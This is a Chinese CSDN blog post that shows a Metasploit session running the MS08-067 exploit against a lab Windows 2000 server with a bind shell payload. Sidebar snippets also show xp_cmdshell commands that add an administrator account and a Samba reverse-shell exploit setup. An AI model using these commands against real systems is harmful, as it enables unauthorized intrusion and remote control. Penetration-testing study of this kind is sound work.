Ubuntu10.04下使用metasploit对win2000 server进行MS08-067溢出

最新推荐文章于 2021-12-03 08:40:05 发布
最新推荐文章于 2021-12-03 08:40:05 发布
阅读量584 收藏
点赞数
分类专栏: Hacking 文章标签: ubuntu server browser service
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6773656
版权

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   —-     —————  ——–  ———–
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Exploit target:

   Id  Name
   –  —-
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.121.129
RHOST => 192.168.121.129
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > set LPORT 9999
LPORT => 9999
msf exploit(ms08_067_netapi) > exploit

7禧
关注
专栏目录
Windows漏洞:MS08-067
Nanyeer的博客
03-21 1686
MS08-067漏洞(远程命令执行漏洞)的演示
linux 键盘记录,学习笔记 kali linux 关于MS17-101漏洞攻击与键盘记录
weixin_28747937的博客
05-15 861
环境: 攻击机:192.168.200.101 //kali Linux 2020靶机:192.168.200.103 (未打MS17-010补丁windowsServices2008.x64)1:msfconsole //进入me...
MS 08-067失败过程记录
weixin_51387754的博客
06-20 425
建好后开启使用enter FN+F8我同意 由于是选择安装分区。由于我们是新建的虚拟机,所以上面的磁盘是空白的,我们需要先新建分区,按C键新建分区(建议划分2个分区,一个作为系统盘,一个作为数据盘)。 新建分区之后要进行格式化,对C:盘进行格式化。推荐使用NTFS文件系统格式磁盘分区,因为其能支持更多的功能。 格式化完成后虚拟机将自动重启。之后进入安装向导,点击“下一步”。 设置区域及语言,核对一下是否正确。点击“下一步”。 输入姓名或者单位。这个不是很重要,随便填一下就可以。 计算机名默认就.
通过MSSQL 2000 入侵服务器主机器
生活要快乐 - 魏言
03-01 627
首先确保得到数据库超级管理员权限然后执行如下SQL命令:1、exec master.dbo.xp_cmdshell net user hacker hacker /add 2、exec master.dbo.xp_cmdshell net localgroup administrators hacker /add  解释:1.通过调用cmdshell   也就是cmd
针对利用ms_08_067漏洞攻击靶机出现的问题
weixin_42387926的博客
12-03 3305
试了4个虚拟机,终于可以成功攻击了 第一个是windows2000,不知道这么多版本有啥区别 然后这个虚拟机厉害了,一exploit靶机直接倒计时关机,这防御手段玉石俱焚 windows2000 无法解决,kali机也显示攻击失败 第二个是下载了一个windowsXP 好像是SP2中文 这个445端口就没开,然后找资料把它打开,然后exploit后显示对方445端口不接收还是啥的,防火墙也关了,不李姐,然后看到有人说是不是只对英文版攻击有效,果断再换(但看到有中文版攻击成功的) 然后换成windowsXPS
ubuntu离线安装包ssh-server.zip
12-06
Ubuntu20.04离线安装openssh-server 安装步骤: sudo dpkg -i libssl1.0.0_1.0.2n-1ubuntu5.7_amd64.deb sudo dpkg -i openssh-client_8.4p1-6ubuntu1_amd64.deb sudo dpkg -i openssh-sftp-server_8.4p1-6ubuntu1_...
Ubuntu10.04下Hadoop-0.20.2集群配置手册.doc
最新发布
09-18
Ubuntu10.04下Hadoop-0.20.2集群配置手册】 这篇文档主要介绍了如何在Ubuntu 10.04操作系统环境下配置Hadoop-0.20.2集群,包括集群的硬件环境准备、软件环境的搭建、SSH无密码验证以及Hadoop的配置步骤。 首先,...
Ubuntu 10.04 安装配置手记.pdf
10-15
本文档记录了 Ubuntu 10.04 的安装配置过程,包括硬盘安装、Grub4Dos 安装、menu.lst 文件修改、ubuntu-10.04-alternate-i386.iso 文件复制、安装过程、系统通用配置等。 一、硬盘安装 Ubuntu 10.04 Alternate i386...
ubuntu10.04下安装svn server
11-08
下面我们将详细探讨如何在Ubuntu 10.04上安装、配置SVN服务器,并使用客户端进行操作。 首先,安装SVN服务器可以通过执行以下命令来完成: ```bash sudo apt-get install subversion ``` 安装完成后,你需要创建一...
ubuntu10.04配置 nginx+php-fpm模式的详解
12-19
在本文中,我们将深入探讨如何在Ubuntu 10.04上配置Nginx与PHP-FPM集成,以便实现高效且稳定的PHP应用服务。首先,我们需要安装必要的组件。 ### 安装PHP-FPM 要安装PHP-FPM(FastCGI Process Manager),我们需要...
Metasploit攻击xp,windows/smb/ms08_067_netapi
Shiliang1995
10-23 1919
第一步 安装XP虚拟机 这里用的系统版本如下 然后用nmap扫描XP系统的ip地址发现,扫不出来445端口,也就不用metasploit进行攻击 所以先对XP设置一下 编辑注册表HKEY_LOCAL_MACHINE=>SYSTEM=>CurrentControlSet=>Services=>NetBT=>Parameters 在Parameters上右键...
微软ms08-067渗透实践
Louisnie
08-29 5287
简单描述:MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的...
ms08_067漏洞的使用艺术
CODING...
11-10 1万+
ms08_067漏洞是的著名远程溢出漏洞,它的影响范围非常大,甚至一些vista的系统都会有这个远程溢出的漏洞。现在我们就使用metasploit利用ms08_067漏洞对XP虚拟机进行渗透。博主使用的是kali linux 2.0对一台windows XP SP3的虚拟机进行渗透测试。1.使用windows/shell/reverse_tcp首先我们先是用windows/shell_bind_tc
Ubuntu10.04使用metasploitwin2000 server进行MS06-040溢出
收集盒 Book box
09-14 2296
msf > use exploit/windows/smb/ms06_040_netapi msf exploit(ms06_040_netapi) > set RHOST 192.168.121.129 RHOST => 192.168.121.129 msf explo
【转】sqlmap用户手册
weixin_33851177的博客
06-18 1267
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页...
03.[445]samba-linux
有梦就别怕痛
09-20 596
msf > search samba msf > use exploit/multi/samba/usermap_script  msf exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse msf exploit(multi/samba/usermap_script) > set RHOST ...
445端口入侵详解
热门推荐
无界编程
03-23 7万+
445端口入侵详解   关于“445端口入侵”的内容445端口入侵详解本站搜索更多关于“445端口入侵”的内容 445端口入侵,在这之前我们首先要看的还是445端口为什么回成为入侵的端口呢?445端口就是IPC 服务的默认端口                                                            ipc$一 摘要 二 什么是 ipc$ 三 什么是空会
Ubuntu10.04 教程:使用F-Spot管理照片
"Ubuntu10.04(lucid)中文教程_part3主要介绍了如何使用F-Spot照片管理器处理和管理图像。用户可以学习如何从计算机硬盘或数码相机导入照片,以及查看和管理这些照片的方法。" 在Ubuntu 10.04 (Lucid Lynx)操作系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值